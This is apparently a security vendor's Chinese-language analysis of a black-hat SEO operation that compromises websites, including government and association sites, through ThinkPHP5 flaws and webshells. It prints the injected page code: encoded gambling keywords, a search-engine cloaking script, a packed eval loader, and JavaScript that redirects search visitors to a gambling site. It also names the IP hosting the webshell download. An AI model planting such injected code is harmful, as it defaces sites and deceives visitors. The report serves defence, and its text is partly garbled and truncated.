從入侵到變現——「黑洞」下的黑帽SEO分析

概述
因爲互聯網入口流量主要被搜索引擎佔據，網站在搜索引擎中的排名直接影響到市場營銷效果，所以SEO服務應運而生。SEO(Search Engine Optimization)全稱爲搜索引擎優化，是指利用搜索引擎的規則提升網站在相關搜索引擎內的天然排名。SEO服務分爲兩種：一種是合法的技術手段，經過站內優化、站外優化、內容建設等合理手段提高網站排名；第二種是使用做弊手段快速提高網站在搜索引擎內的排名，好比使用蜘蛛池、暗鏈、站羣、客戶端劫持、服務端劫持等黑客技術手段，這種一般稱爲黑帽SEO。

黑帽SEO服務的對象一般爲非法的產品或網站。與合法的SEO技術服務相比，黑帽SEO的效果很是快速，可以在短期內提高排名進行快速推廣，且推廣的網站內容不受法律約束。黑客的主要目標是牟取非法的經濟利益，黑帽SEO是黑客快速變現的重要手段。在地下網絡世界已經造成了一條完整的黑色產業鏈：黑客利用網站存在的安全漏洞，經過入侵手段獲取網站的控制權並植入後門，將後門出售給黑帽SEO運營者，黑帽SEO經過暗鏈、網站劫持等技術手段篡改網站內容，爲黃、賭、賭等非法站點進行搜索引擎推廣。

阿里雲安全團隊於近日跟蹤到了一個利用web漏洞入侵網站並經過劫持網站首頁進行批量SEO推廣的黑產團伙 。此黑產團伙控制網站數量巨大，推廣的網站多爲非法的博彩類網站，對互聯網產業存在巨大的危害。被入侵網站每每被植入多個後門，可被黑客重複利用，成爲黑產的牟利工具，存在巨大的安全風險。該黑產團伙的上游黑客組織掌握了大量IP基礎設施，爲了繞過安全防護，天天使用數千個代理/秒撥IP進行瘋狂入侵。

因爲該黑產團伙控制的外部連接域名註冊郵箱均爲dasheng123123@gmail.com，所以咱們將其命名爲DaSheng。

被控制網站分佈
通過長期跟蹤發現，僅2019年1月到3月，該黑產團伙就控制並利用了至少12700個站點。從被植入暗鏈網頁的頂級域名分佈來看，".com"佔比最多，佔總數的72%。被植入暗鏈的網站存在爲數很多的非營利組織/政府網站，絕大部分爲地方性行業協會網站，但也有像中國XXX發展研究中、中國XXX發展聯盟等全國性協會網站。行業協會/政府網站具備較高公信力，黑帽SEO「傍」上這些網站可以在搜索引擎裏快速提升排名，可是發佈的「黃賭毒「信息嚴重影響了網站的公信力。網站存在暗鏈也意味着存在嚴重的安全漏洞，若是不及時修復有可能引起重大的網絡安全事件。

圖1:被劫持網站頂級域名分佈

圖2:某政府網站被植入暗鏈

黑帽SEO手法分析
該黑產團伙經過被入侵網站的webshell後門在網站首頁的頭部插入以下代碼，該代碼會修改頁面title、keywords、description，並判斷瀏覽者是不是百度搜索引擎，若是不是搜索引擎則將網站titile修改成合法內容，以達到隱藏本身的目的：

<title>北京賽車官網開獎_北京賽車開獎網站【實時更新】</title>
<meta name="keywords" content="&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#32467;&#26524;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#35760;&#24405;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#32593;&#31449;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#30452;&#25773;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#30452;&#25773;&#24179;&#21488;&#44;&#21271;&#20140;&#36187;&#36710;&#23448;&#26041;&#24320;&#22870;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#32467;&#26524;&#35760;&#24405;"/>
<meta name="description" content="&#21271;&#20140;&#36187;&#36710;&#23448;&#26041;&#24320;&#22870;&#32593;&#31449;&#12304;&#89;&#89;&#50;&#51;&#52;&#46;&#67;&#79;&#77;&#12305;&#44;&#26102;&#26102;&#31934;&#20934;&#25552;&#20379;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#35760;&#24405;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#35270;&#39057;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#32467;&#26524;&#44;&#21271;&#20140;&#36187;&#36710;&#22312;&#32447;&#30452;&#25773;&#44;&#25171;&#36896;&#20840;&#32593;&#26368;&#20339;&#30340;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#30452;&#25773;&#24179;&#21488;"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="LEO YOUNG 李洋地板- By Orange NT"}</script>

</script>
被修改的內容經過HTML的ASCII編碼隱藏，還原後爲常見的博彩類關鍵詞：

titile:北京賽車官網開獎北京賽車開獎網站【實時更新】
keywords:北京賽車開獎結果北京賽車開獎記錄北京賽車開獎網站北京賽車開獎直播北京賽車開獎直播平臺北京賽車官方開獎北京賽車開獎結果記錄
description:北京賽車官方開獎網站【】時時精準提供北京賽車開獎記錄北京賽車開獎視頻北京賽車開獎結果北京賽車在線直播打造全網最佳的北京賽車開獎直播平臺
第二段js腳本是通過混淆編碼的，執行後獲得新的js，並連接到黑產團伙控制的外部javascript

< script type = "text/javascript" > eval(function(p, a, c, k, e, d) {

e = function(c) {
    return (c < a ?"": e(parseInt(c / a))) + ((c = c % a) > 35 ?String.fromCharCode(c + 29) : c.toString(36))
};
if (!''.replace(/^/, String)) {
    while (c--) d[e(c)] = k[c] || e(c);
    k = [function(e) {
        return d[e]
    }];
    e = function() {
        return '\\w+'
    };
    c = 1;
};
while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
return p;

/
執行後的js：

<script type="text/javascript" src="https://www.cpdas8.com/ylc.js...;></script>
該js代碼會自動向百度站長平臺和360站長平臺推送網頁內容，並經過referrer判斷瀏覽者是否來自搜索引擎，若是是則跳轉到真實的被推廣網站。

(function () {

/*百度推送代碼*/
 var bp = document.createElement('script');
 bp.src = '//push.zhanzhang.baidu.com/push.js';
 var s = document.getElementsByTagName("script")[0];
 s.parentNode.insertBefore(bp, s);
 /*360推送代碼*/
 var src = document.location.protocol + '//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9';
 document.write('<script src="' + src + '" id="sozz"><\/script>');
 })();

document.writeln("<script LANGUAGE="Javascript">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf("baidu")>0 || s.indexOf("sogou")>0 || s.indexOf("soso")>0 ||s.indexOf("sm")>0 ||s.indexOf("uc")>0 ||s.indexOf("bing")>0 ||s.indexOf("yahoo")>0 ||s.indexOf("so")>0 )");
document.writeln("location.href="https://2019c2.com";");
document.writeln("</script>");
咱們在搜索引擎中搜索其推廣的暗鏈關鍵詞，能夠看到多個被入侵的網站在搜索引擎處在排名靠前的位置。

圖3:被黑帽SEO篡改的合法網站

攻擊向量
黑帽SEO團伙使用的webshell後門一般是由上游的黑客組織提供，經阿里雲安全團隊研究跟蹤到了DaSheng的最大「供貨商」。該黑客團伙從2019年1月份開始變得異常活躍，主要使用2018年爆發的2個Thinkphp5遠程代碼執行漏洞，偶爾也會使用其它的web漏洞。根據其使用的webshell文件名和主要的入侵方式，咱們將其命名爲ThinkphpDD。

該團伙的攻擊payload中會從http://43.255.29.112/php/dd.t...，該代碼是一個webshell後門。一般入侵成功幾天以後就會被DaSheng黑產團伙利用，爲了可以長期控制站點，DaSheng會在被入侵網站的不一樣目錄植入多個webshell後門，該後門具有較強的免殺性。

圖4:被植入的webshell後門

黑客團伙使用的攻擊payload：

IP基礎設施
一般攻擊者使用的IP因爲存在惡意攻擊行爲會被IPS、防火牆等安全設備攔截。ThinkphpDD爲了繞過安全防禦獲取最大的利益，使用了大量IP進行網絡攻擊，從2019年1月開始天天使用幾千個IP進行攻擊。並且使用的IP複用率低，被該團伙利用過的IP已超過10萬個。使用過的IP絕大部分來自中國，佔比89%。結合阿里雲的代理IP威脅情報，至少有86%的IP是匿名代理或秒撥IP。可見該團伙爲了獲取黑產利益投入巨大。

圖5:黑客使用的IP數量趨勢

圖6:黑客攻擊次數趨勢

圖7:黑客使用的IP國家分佈

圖8:黑客使用的IP來源分佈

安全建議
一、用戶應及時更新服務，或修補網站漏洞，避免成爲入侵的受害者；

二、用戶可對網站源代碼進行檢測，及時清理被植入的網站後門、惡意代碼；

三、建議使用阿里雲安全的下一代雲防火牆產品，可以及時阻斷惡意攻擊、配置智能策略，可以有效幫助防護入侵；

四、對於有更高定製化要求的用戶，能夠考慮使用阿里雲安全管家服務。購買服務後將有經驗豐富的安全專家提供諮詢服務，定製適合您的方案，幫助加固系統，預防入侵。